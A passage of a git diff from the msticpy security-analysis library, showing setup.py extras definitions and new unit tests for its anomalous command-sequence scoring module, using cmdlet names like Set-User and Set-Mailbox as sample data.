+    INSTALL_DEV_REQUIRES = fh.readlines()
+
+
+def _combine_extras(extras: list) -> list:
+    return list(
+        {pkg for name, pkgs in EXTRAS.items() for pkg in pkgs if name in extras}
+    )
+
+
+# Extras definitions
+EXTRAS = {
+    "dev": INSTALL_DEV_REQUIRES,
+    "vt3": ["vt-py>=0.6.1", "nest_asyncio>=1.4.0"],
+    "splunk": ["splunk-sdk>=1.6.0"],
+    "sumologic": ["sumologic-sdk>=0.1.11", "openpyxl>=3.0"],
+    "kql": ["KqlmagicCustom[jupyter-extended]>=0.1.114.dev25"],
+    "_azure_core": [
+        "azure-mgmt-compute>=4.6.2",
+        "azure-mgmt-core>=1.2.1",
+        "azure-mgmt-monitor>=2.0.0",
+        "azure-mgmt-network>=2.7.0",
+        "azure-mgmt-resource>=16.1.0",
+        "azure-storage-blob>=12.5.0",
+        "azure-mgmt-resourcegraph>=8.0.0",
+    ],
+    "keyvault": [
+        "azure-keyvault-secrets>=4.0.0",
+        "azure-mgmt-keyvault>=2.0.0",
+        "keyring>=13.2.1",  # needed by Key Vault package
     ],
-    install_requires=INSTALL_REQUIRES
+    "ml": ["scikit-learn>=0.20.2", "scipy>=1.1.0", "statsmodels>=0.11.1"],
+    "sql2kql": ["moz_sql_parser>=4.5.0,<=4.11.21016"],
+    "riskiq": ["passivetotal>=2.5.3"],
+}
+extras_all = [
+    extra for name, extras in EXTRAS.items() for extra in extras if name != "dev"
+]
+EXTRAS["all"] = extras_all
+
+# Create combination extras
+EXTRAS["all"] = sorted(
+    _combine_extras(list({name for name in EXTRAS if name != "dev"}))
 )
+
+EXTRAS["azure"] = sorted(_combine_extras(["_azure_core", "keyvault"]))
+EXTRAS["test"] = sorted(_combine_extras(["all", "dev"]))
+EXTRAS["azsentinel"] = sorted(_combine_extras(["azure", "kql", "keyvault"]))
+EXTRAS["azuresentinel"] = sorted(_combine_extras(["azure", "kql", "keyvault"]))
+EXTRAS["sentinel"] = sorted(_combine_extras(["azure", "kql", "keyvault"]))
+
+
+if __name__ == "__main__":
+    setuptools.setup(
+        install_requires=INSTALL_REQUIRES, extras_require=EXTRAS, version=__version__
+    )
diff --git a/tests/analysis/__init__.py b/tests/analysis/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/analysis/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/analysis/test_anom_seq.py b/tests/analysis/test_anom_seq.py
new file mode 100644
index 000000000..a6372a5f5
--- /dev/null
+++ b/tests/analysis/test_anom_seq.py
@@ -0,0 +1,96 @@
+import unittest
+from datetime import datetime
+import pandas as pd
+import numpy as np
+
+from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
+from msticpy.analysis.anomalous_sequence import anomalous
+
+
+class TestAnomalous(unittest.TestCase):
+    def setUp(self) -> None:
+        self.sessions1 = [
+            ["Set-User", "Set-User"],
+            ["Set-Mailbox", "Set-User", "Set-User"],
+        ]
+        self.sessions2 = [
+            [
+                Cmd("Set-User", {"Identity"}),
+                Cmd("Set-User", {"Identity", "City", "Name"}),
+            ],
+            [
+                Cmd("Set-Mailbox", {"Identity"}),
+                Cmd("Set-User", {"Identity", "City"}),
+                Cmd("Set-User", {"Identity"}),
+            ],
+        ]
+        self.sessions3 = [
+            [
+                Cmd("Set-User", {"Identity": "blah"}),
+                Cmd("Set-User", {"Identity": "haha", "City": "york", "Name": "bob"}),
+            ],
+            [
+                Cmd("Set-Mailbox", {"Identity": "blah"}),
+                Cmd("Set-User", {"Identity": "blah", "City": "london"}),
+                Cmd("Set-User", {"Identity": "haha"}),
+            ],
+        ]
+        self.times = [datetime(2019, 3, 1), datetime(2019, 5, 6)]
+        self.data1 = pd.DataFrame({"session": self.sessions1, "time": self.times})
+        self.data2 = pd.DataFrame({"session": self.sessions2, "time": self.times})
+        self.data3 = pd.DataFrame({"session": self.sessions3, "time": self.times})
+
+    def tearDown(self) -> None:
+        self.sessions1 = None
+        self.sessions2 = None
+        self.sessions3 = None
+        self.times = None
+        self.data1 = None
+        self.data2 = None
+        self.data3 = None
+
+    def test_score_sessions(self):
+        actual = anomalous.score_sessions(
+            data=self.data1, session_column="session", window_length=3
+        )
+        self.assertTrue(isinstance(actual, pd.DataFrame))
+        for col in self.data1.columns:
+            self.assertTrue(col in actual.columns)
+        self.assertEqual(len(actual.columns), len(self.data1.columns) + 2)
+        self.assertEqual(len(actual), len(self.data1))
+        window = actual["rarest_window3"].iloc[0]
+        self.assertTrue(isinstance(window, list))
+        self.assertTrue(isinstance(window[0], str))
+
+        actual = anomalous.score_sessions(
+            data=self.data2, session_column="session", window_length=3
+        )
+        window = actual["rarest_window3"].iloc[0]
+        cmd = window[0]
+        self.assertTrue(isinstance(window, list))
+        self.assertTrue("name" in dir(cmd))
+        self.assertTrue("params" in dir(cmd))
+        self.assertTrue(isinstance(cmd.params, set))
+
+        actual = anomalous.score_sessions(
+            data=self.data3, session_column="session", window_length=3
+        )
+        window = actual["rarest_window3"].iloc[0]
+        cmd = window[0]
+        self.assertTrue(isinstance(window, list))
+        self.assertTrue("name" in dir(cmd))
+        self.assertTrue("params" in dir(cmd))
+        self.assertTrue(isinstance(cmd.params, dict))
+
+        actual = anomalous.score_sessions(
+            data=self.data3, session_column="session", window_length=5
+        )
+        window = actual["rarest_window5"].iloc[0]
+        lik = actual["rarest_window5_likelihood"].iloc[0]
+        self.assertTrue(isinstance(window, list))
+        self.assertEqual(len(window), 0)
+        self.assertTrue(np.isnan(lik))
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_cmds_only.py b/tests/analysis/test_anom_seq_cmds_only.py
new file mode 100644
index 000000000..d47d49418
--- /dev/null
+++ b/tests/analysis/test_anom_seq_cmds_only.py
@@ -0,0 +1,325 @@
+from collections import defaultdict
+import unittest
+
+import numpy as np
+
+from msticpy.analysis.anomalous_sequence.utils import cmds_only
+from msticpy.analysis.anomalous_sequence.utils.data_structures import StateMatrix
+
+START_TOKEN = "##START##"
+END_TOKEN = "##END##"
+UNK_TOKEN = "##UNK##"
+
+
+class TestCmdsOnly(unittest.TestCase):
+    def setUp(self):
+        prior_probs = {
+            "##START##": 0.19047619047619047,
+            "Set-User": 0.3333333333333333,
+            "##END##": 0.19047619047619047,
+            "##UNK##": 0.2857142857142857,
+        }
+        self.prior_probs = StateMatrix(states=prior_probs, unk_token=UNK_TOKEN)
+
+        trans_probs = {
+            "##START##": {"Set-User": 0.5, "##END##": 0.25, "##UNK##": 0.25},
+            "Set-User": {"##END##": 0.5, "Set-User": 0.25, "##UNK##": 0.25},
+            "##UNK##": {
+                "Set-User": 0.3333333333333333,
+                "##END##": 0.3333333333333333,
+                "##UNK##": 0.3333333333333333,
+            },
+        }
+        self.trans_probs = StateMatrix(states=trans_probs, unk_token=UNK_TOKEN)
+
+    def tearDown(self):
+        self.prior_probs = None
+        self.trans_probs = None
+
+    def test_compute_counts(self):
+        sessions = [[]]
+        seq1_expected = {START_TOKEN: 1, END_TOKEN: 1}
+        seq2_expected = {START_TOKEN: {END_TOKEN: 1}}
+        seq1_actual, seq2_actual = cmds_only.compute_counts(
+            sessions=sessions,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, seq1_expected)
+        self.assertDictEqual(seq2_actual, seq2_expected)
+
+        cmd = "Set-User"
+        sessions = [[cmd]]
+        seq1_expected = {START_TOKEN: 1, cmd: 1, END_TOKEN: 1}
+        seq2_expected = {START_TOKEN: {cmd: 1}, cmd: {END_TOKEN: 1}}
+
+        seq1_actual, seq2_actual = cmds_only.compute_counts(
+            sessions=sessions,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, seq1_expected)
+        self.assertDictEqual(seq2_actual, seq2_expected)
+
+    def test_laplace_smooth_counts(self):
+        # sessions = [[]]
+        _seq1 = defaultdict(lambda: 0, {START_TOKEN: 1, END_TOKEN: 1})
+        _seq2 = defaultdict(lambda: defaultdict(lambda: 0))
+        _seq2[START_TOKEN][END_TOKEN] = 1
+        seq1_expected = {START_TOKEN: 3, END_TOKEN: 3, UNK_TOKEN: 4}
+        seq2_expected = {
+            START_TOKEN: {END_TOKEN: 2, UNK_TOKEN: 1},
+            UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1},
+        }
+        seq1_actual, seq2_actual = cmds_only.laplace_smooth_counts(
+            seq1_counts=_seq1,
+            seq2_counts=_seq2,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, seq1_expected)
+        self.assertDictEqual(seq2_actual, seq2_expected)
+
+        cmd = "Set-User"
+        # sessions = [[cmd]]
+        _seq1 = defaultdict(lambda: 0, {START_TOKEN: 1, cmd: 1, END_TOKEN: 1})
+        _seq2 = defaultdict(lambda: defaultdict(lambda: 0))
+        _seq2[START_TOKEN][cmd] = 1
+        _seq2[cmd][END_TOKEN] = 1
+        seq1_expected = {START_TOKEN: 4, cmd: 7, END_TOKEN: 4, UNK_TOKEN: 6}
+        seq2_expected = {
+            START_TOKEN: {cmd: 2, END_TOKEN: 1, UNK_TOKEN: 1},
+            cmd: {END_TOKEN: 2, cmd: 1, UNK_TOKEN: 1},
+            UNK_TOKEN: {cmd: 1, END_TOKEN: 1, UNK_TOKEN: 1},
+        }
+
+        seq1_actual, seq2_actual = cmds_only.laplace_smooth_counts(
+            seq1_counts=_seq1,
+            seq2_counts=_seq2,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+        self.assertDictEqual(seq1_actual, seq1_expected)
+        self.assertDictEqual(seq2_actual, seq2_expected)
+
+    def test_compute_likelihood_window(self):
+
+        actual = cmds_only.compute_likelihood_window(
+            window=[],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertTrue(np.isnan(actual))
+
+        actual = cmds_only.compute_likelihood_window(
+            window=["Set-User"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        expected = 1 / 3
+        self.assertEqual(actual, expected)
+
+        actual = cmds_only.compute_likelihood_window(
+            window=["Set-User"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            use_start_token=True,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        expected = 0.5
+        self.assertEqual(actual, expected)
+
+        actual = cmds_only.compute_likelihood_window(
+            window=["Set-User"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            use_start_token=False,
+            use_end_token=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        expected = (1 / 3) * 0.5
+        self.assertEqual(actual, expected)
+
+        actual = cmds_only.compute_likelihood_window(
+            window=["Set-User"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            use_start_token=True,
+            use_end_token=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        expected = 0.5 * 0.5
+        self.assertEqual(actual, expected)
+
+        actual = cmds_only.compute_likelihood_window(
+            window=["dfre"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        expected = self.prior_probs[UNK_TOKEN]
+        self.assertEqual(actual, expected)
+
+    def test_compute_likelihood_windows_in_session(self):
+        actual = cmds_only.compute_likelihood_windows_in_session(
+            session=[],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [])
+
+        actual = cmds_only.compute_likelihood_windows_in_session(
+            session=[],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual, [0.25])
+
+        session = ["Set-User", "dfgg", "Set-User", "Set-User"]
+        actual = cmds_only.compute_likelihood_windows_in_session(
+            session=session,
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=len(session),
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertEqual(len(actual), 1)
+
+        non_geo = actual[0]
+        geo_actual = cmds_only.compute_likelihood_windows_in_session(
+            session=session,
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=len(session),
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=True,
+        )[0]
+        self.assertEqual(geo_actual, non_geo ** (1 / len(session)))
+
+        actual = cmds_only.compute_likelihood_windows_in_session(
+            session=session,
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=len(session),
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertEqual(len(actual), 2)
+
+        actual = cmds_only.compute_likelihood_windows_in_session(
+            session=session,
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=len(session) + 1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertEqual(len(actual), 0)
+
+        actual = cmds_only.compute_likelihood_windows_in_session(
+            session=session,
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=len(session) + 1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertEqual(len(actual), 1)
+
+    def test_rarest_window_session(self):
+
+        actual = cmds_only.rarest_window_session(
+            session=[],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=1,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertTrue(np.isnan(actual[1]))
+        self.assertListEqual(actual[0], [])
+
+        actual = cmds_only.rarest_window_session(
+            session=[],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=1,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertEqual(actual[1], 0.25)
+        self.assertListEqual(actual[0], [])
+
+        actual = cmds_only.rarest_window_session(
+            session=["Set-User", "Set-User"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=3,
+            use_start_end_tokens=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], [])
+        self.assertTrue(np.isnan(actual[1]))
+
+        actual = cmds_only.rarest_window_session(
+            session=["Set-User", "Set-User"],
+            prior_probs=self.prior_probs,
+            trans_probs=self.trans_probs,
+            window_len=3,
+            use_start_end_tokens=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            use_geo_mean=False,
+        )
+        self.assertListEqual(actual[0], ["Set-User", "Set-User"])
+        self.assertEqual(actual[1], 0.0625)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/analysis/test_anom_seq_cmds_params_only.py b/tests/analysis/test_anom_seq_cmds_params_only.py
new file mode 100644
index 000000000..5b6b9f6d9
--- /dev/null
+++ b/tests/analysis/test_anom_seq_cmds_params_only.py
@@ -0,0 +1,476 @@
+import unittest
+from collections import defaultdict
+
+import numpy as np
+
+from msticpy.analysis.anomalous_sequence.utils import cmds_params_only
+from msticpy.analysis.anomalous_sequence.utils.data_structures import StateMatrix, Cmd
+
+START_TOKEN = "##START##"
+END_TOKEN = "##END##"
+UNK_TOKEN = "##UNK##"
+
+
+class TestCmdsParamsOnly(unittest.TestCase):
+    """
+    Test cmds_params_only module.
+
+    Note that when modelling the params:
+
+    We make the modelling assumption that the parameters are independent
+    Bernoulii random variables conditional on the command.
+
+    Note also that because multiple parameters can appear at a time for
+    a command, and because we are computing the probability that each
+    parameter is present or not, we do NOT expect the probabilities to
+    sum to 1.
+
+    Note also that we use laplace smoothing in the counting
+    stage of the calculations. Therefore if you have parameter p which
+    appeared for every occurrence of command c, the resulting
+    probability for param p appearing conditional on command c would
+    NOT equal 1. It would be slightly less due to the laplace smoothing.
+
+    """
+
+    def setUp(self):
+        self.data1 = dict()
+        self.data2 = dict()
+        self.data3 = dict()
+
+        # populate data1
+        self.data1["sessions"] = []
+        self.data1["_seq1_counts"] = defaultdict(lambda: 0)
+        self.data1["seq1_counts"] = StateMatrix({UNK_TOKEN: 2}, UNK_TOKEN)
+        self.data1["_seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["seq2_counts"] = StateMatrix({UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN)
+        self.data1["_param_counts"] = defaultdict(lambda: 0)
+        self.data1["param_counts"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["_cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data1["cmd_param_counts"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN
+        )
+        self.data1["prior_probs"] = StateMatrix({UNK_TOKEN: 1}, UNK_TOKEN)
+        self.data1["trans_probs"] = StateMatrix({UNK_TOKEN: {UNK_TOKEN: 1}}, UNK_TOKEN)
+        self.data1["param_probs"] = StateMatrix({UNK_TOKEN: 0.5}, UNK_TOKEN)
+        self.data1["param_cond_cmd_probs"] = StateMatrix(
+            {UNK_TOKEN: {UNK_TOKEN: 0.5}}, UNK_TOKEN
+        )
+
+        # populate data2
+        self.data2["sessions"] = [[]]
+        self.data2["_seq1_counts"] = defaultdict(
+            lambda: 0, {START_TOKEN: 1, END_TOKEN: 1}
+        )
+        self.data2["seq1_counts"] = StateMatrix(
+            {UNK_TOKEN: 4, START_TOKEN: 3, END_TOKEN: 3}, UNK_TOKEN
+        )
+        self.data2["_seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["_seq2_counts"][START_TOKEN][END_TOKEN] = 1
+        self.data2["seq2_counts"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 2, UNK_TOKEN: 1},
+                UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["_param_counts"] = defaultdict(lambda: 0)
+        self.data2["param_counts"] = StateMatrix({UNK_TOKEN: 3}, UNK_TOKEN)
+        self.data2["_cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data2["cmd_param_counts"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 1},
+                END_TOKEN: {UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["prior_probs"] = StateMatrix(
+            {START_TOKEN: 0.3, END_TOKEN: 0.3, UNK_TOKEN: 0.4}, UNK_TOKEN
+        )
+        self.data2["trans_probs"] = StateMatrix(
+            {
+                START_TOKEN: {
+                    END_TOKEN: 0.6666666666666666,
+                    UNK_TOKEN: 0.3333333333333333,
+                },
+                UNK_TOKEN: {END_TOKEN: 0.5, UNK_TOKEN: 0.5},
+            },
+            UNK_TOKEN,
+        )
+        self.data2["param_probs"] = StateMatrix({UNK_TOKEN: 0.3}, UNK_TOKEN)
+        self.data2["param_cond_cmd_probs"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 0.3333333333333333},
+                END_TOKEN: {UNK_TOKEN: 0.3333333333333333},
+                UNK_TOKEN: {UNK_TOKEN: 0.25},
+            },
+            UNK_TOKEN,
+        )
+
+        # populate data3
+        cmd = "Set-User"
+        self.data3["sessions"] = [
+            [
+                Cmd(name="Set-User", params={"City", "Identity"}),
+                Cmd(name="Set-User", params={"Identity"}),
+            ]
+        ]
+        self.data3["_seq1_counts"] = defaultdict(
+            lambda: 0, {START_TOKEN: 1, END_TOKEN: 1, cmd: 2}
+        )
+        self.data3["seq1_counts"] = StateMatrix(
+            {UNK_TOKEN: 6, START_TOKEN: 4, END_TOKEN: 4, cmd: 8}, UNK_TOKEN
+        )
+        self.data3["_seq2_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["_seq2_counts"][START_TOKEN][cmd] = 1
+        self.data3["_seq2_counts"][cmd][END_TOKEN] = 1
+        self.data3["_seq2_counts"][cmd][cmd] = 1
+        self.data3["seq2_counts"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 2},
+                UNK_TOKEN: {END_TOKEN: 1, UNK_TOKEN: 1, cmd: 1},
+                cmd: {cmd: 2, END_TOKEN: 2, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["_param_counts"] = defaultdict(lambda: 0, {"Identity": 2, "City": 1})
+        self.data3["param_counts"] = StateMatrix(
+            {UNK_TOKEN: 4, "City": 2, "Identity": 3}, UNK_TOKEN
+        )
+        self.data3["_cmd_param_counts"] = defaultdict(lambda: defaultdict(lambda: 0))
+        self.data3["_cmd_param_counts"][cmd]["Identity"] = 2
+        self.data3["_cmd_param_counts"][cmd]["City"] = 1
+        self.data3["cmd_param_counts"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 1},
+                END_TOKEN: {UNK_TOKEN: 1},
+                UNK_TOKEN: {UNK_TOKEN: 1},
+                cmd: {"City": 2, "Identity": 3, UNK_TOKEN: 1},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["prior_probs"] = StateMatrix(
+            {
+                START_TOKEN: 0.18181818181818182,
+                END_TOKEN: 0.18181818181818182,
+                UNK_TOKEN: 0.2727272727272727,
+                cmd: 0.36363636363636365,
+            },
+            UNK_TOKEN,
+        )
+        self.data3["trans_probs"] = StateMatrix(
+            {
+                START_TOKEN: {END_TOKEN: 0.25, UNK_TOKEN: 0.25, cmd: 0.5},
+                UNK_TOKEN: {END_TOKEN: 1 / 3, UNK_TOKEN: 1 / 3, cmd: 1 / 3},
+                cmd: {END_TOKEN: 0.4, UNK_TOKEN: 0.2, cmd: 0.4},
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_probs"] = StateMatrix(
+            {
+                UNK_TOKEN: 0.18181818181818182,
+                "Identity": 0.13636363636363635,
+                "City": 0.09090909090909091,
+            },
+            UNK_TOKEN,
+        )
+        self.data3["param_cond_cmd_probs"] = StateMatrix(
+            {
+                START_TOKEN: {UNK_TOKEN: 0.25},
+                END_TOKEN: {UNK_TOKEN: 0.25},
+                UNK_TOKEN: {UNK_TOKEN: 0.16666666666666666},
+                cmd: {"City": 0.25, "Identity": 0.375, UNK_TOKEN: 0.125},
+            },
+            UNK_TOKEN,
+        )
+
+    def tearDown(self):
+        self.data1 = None
+        self.data2 = None
+        self.data3 = None
+
+    def test_compute_counts(self):
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+        ) = cmds_params_only.compute_counts(
+            sessions=self.data1["sessions"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data1["_seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data1["_seq2_counts"])
+        self.assertDictEqual(param_actual, self.data1["_param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data1["_cmd_param_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+        ) = cmds_params_only.compute_counts(
+            sessions=self.data2["sessions"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data2["_seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data2["_seq2_counts"])
+        self.assertDictEqual(param_actual, self.data2["_param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data2["_cmd_param_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+        ) = cmds_params_only.compute_counts(
+            sessions=self.data3["sessions"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data3["_seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data3["_seq2_counts"])
+        self.assertDictEqual(param_actual, self.data3["_param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data3["_cmd_param_counts"])
+
+    def test_laplace_smooth_counts(self):
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+        ) = cmds_params_only.laplace_smooth_counts(
+            seq1_counts=self.data1["_seq1_counts"],
+            seq2_counts=self.data1["_seq2_counts"],
+            param_counts=self.data1["_param_counts"],
+            cmd_param_counts=self.data1["_cmd_param_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data1["seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data1["seq2_counts"])
+        self.assertDictEqual(param_actual, self.data1["param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data1["cmd_param_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+        ) = cmds_params_only.laplace_smooth_counts(
+            seq1_counts=self.data2["_seq1_counts"],
+            seq2_counts=self.data2["_seq2_counts"],
+            param_counts=self.data2["_param_counts"],
+            cmd_param_counts=self.data2["_cmd_param_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data2["seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data2["seq2_counts"])
+        self.assertDictEqual(param_actual, self.data2["param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data2["cmd_param_counts"])
+
+        (
+            seq1_actual,
+            seq2_actual,
+            param_actual,
+            cmd_param_actual,
+        ) = cmds_params_only.laplace_smooth_counts(
+            seq1_counts=self.data3["_seq1_counts"],
+            seq2_counts=self.data3["_seq2_counts"],
+            param_counts=self.data3["_param_counts"],
+            cmd_param_counts=self.data3["_cmd_param_counts"],
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+            unk_token=UNK_TOKEN,
+        )
+
+        self.assertDictEqual(seq1_actual, self.data3["seq1_counts"])
+        self.assertDictEqual(seq2_actual, self.data3["seq2_counts"])
+        self.assertDictEqual(param_actual, self.data3["param_counts"])
+        self.assertDictEqual(cmd_param_actual, self.data3["cmd_param_counts"])
+
+    def test_compute_prob_setofparams_given_cmd(self):
+        actual = cmds_params_only.compute_prob_setofparams_given_cmd(
+            cmd="Set-User",
+            params=set(),
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_geo_mean=False,
+        )
+        self.assertEqual(actual, 1)
+
+        actual = cmds_params_only.compute_prob_setofparams_given_cmd(
+            cmd="Set-User",
+            params={"Identity"},
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_geo_mean=False,
+        )
+        self.assertEqual(actual, 0.24609375)
+
+        actual = cmds_params_only.compute_prob_setofparams_given_cmd(
+            cmd="Set-User",
+            params={"Identity"},
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_geo_mean=True,
+        )
+        self.assertEqual(actual, 0.6266622418705731)
+
+    def test_compute_likelihood_window(self):
+        actual = cmds_params_only.compute_likelihood_window(
+            window=[],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertTrue(np.isnan(actual))
+
+        actual = cmds_params_only.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_start_token=False,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.22787717886202657)
+
+        actual = cmds_params_only.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_start_token=True,
+            use_end_token=False,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.31333112093528653)
+
+        actual = cmds_params_only.compute_likelihood_window(
+            window=[Cmd("Set-User", {"Identity"})],
+            prior_probs=self.data3["prior_probs"],
+            trans_probs=self.data3["trans_probs"],
+            param_cond_cmd_probs=self.data3["param_cond_cmd_probs"],
+            use_start_token=False,
+            use_end_token=True,
+            start_token=START_TOKEN,
+            end_token=END_TOKEN,
+        )
+        self.assertEqual(actual, 0.09115087154481064)
+
+    def test_compute_likelihood_windows_in_session(self):
